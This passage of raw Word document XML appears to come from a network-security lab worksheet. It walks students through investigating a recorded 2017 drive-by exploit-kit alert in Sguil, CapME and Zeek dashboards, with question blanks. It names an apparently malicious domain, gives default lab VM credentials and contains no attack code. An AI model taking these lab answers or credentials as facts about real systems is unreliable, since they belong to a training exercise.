          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is its purpose?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What victims does it target and vulnerabilities it attempts to exploit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is the malware family for this event?</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the severity of the exploit?</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an Exploit Kit? (EK) Search on the internet to answer this question.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View the Transcript capME!</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">value, you can pivot to CapME to inspect the transcript of the event.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5400040" cy="1733550"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6" name="Picture 17" descr="screenshot of alert _id highlighted in the first NIDS log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descr="screenshot of alert _id highlighted in the first NIDS log entry"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId20"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="1733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0pt;height:136.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId20" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the CapME! window you can see the transcript from th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e session. It shows the transactions between the source computer, in blue, and the destinations that are accessed by the source. A lot of valuable information, including a link to the pcap file that is related to this alert, is available in the transcript.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5683250" cy="3455035"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7" name="Picture 19" descr="screenshot of transcript for the first NIDS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descr="screenshot of transcript for the first NIDS alert."/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId21"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5683250" cy="3455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7.50pt;height:272.05pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId21" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examine the first block of blue text. This is the request from the source to the destination webserver. Note that two URLs are listed in this block. The first is ta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gged as SRC: REFERER. This is the website that the source computer first accessed. However, the server referred browser the HTTP GET request to the SRC:HOST. Something in the HTML sent the source to this site. It looks like this could be a drive-by attack!</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What website did the user intend to connect to?</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URL did the browser refer the user to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What kind of content is requested by the source host from tybenme.com? Why could this be a problem?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Look in the DST server block of the transcript too.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="840" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close the CapME! browser tab.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the top of the NIDS Alert Dashboard click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entry located under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Zeek Hunting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">heading.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the HTTP dashboard, verify that your absolute time range includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">2017-01-27 22:54:30.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">2017-01-27 22:56:00.000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scroll down to the HTTP - Sites section of the dashboard.</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What are some of the websites that are listed?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="600" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We should know some of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se websites from the transcript that we read earlier. Not all of the sites that are shown are part of the exploit campaign. Research the URLs by searching for them on the internet. Do not connect to them. Place the URLs in quotes when you do your searches.</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Which of these sites is likely part of the exploit campaign?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="600" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What are the HTTP - MIME Types listed in the Tag Cloud?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="360" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1101"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Investigate the Exploit with Sguil</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Part 2, you will use Sguil to check the IDS alerts and gather more information about the series of events related to this attack.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The alert IDs used in this lab are for example only. The alert IDs on your VM may be different.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open Sguil and locate the alerts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch Sguil from the desktop. Login with username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Enable all sensors and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate the group of alerts from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">January 27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2017</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</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According to Sguil, what are the timestamps for the first and last of the alerts that occurred within about a second of each other?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Investigate the alerts in Sguil.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Show Packet Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Show Rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">checkboxes to see the packet header field information and the IDS signature rule related to the alert.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">According to the IDS signature rule which malware family triggered this alert?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> You may need to scroll through the alert signature to find this entry.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maximize the Sguil window and size the Event Message column so that you can see the text of the entire message. Look at the Event Messages for each of the alert IDs related to this attack.</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According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?</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Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?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By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View Transcripts of Events</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click the associated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from the menu as shown in the figure. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
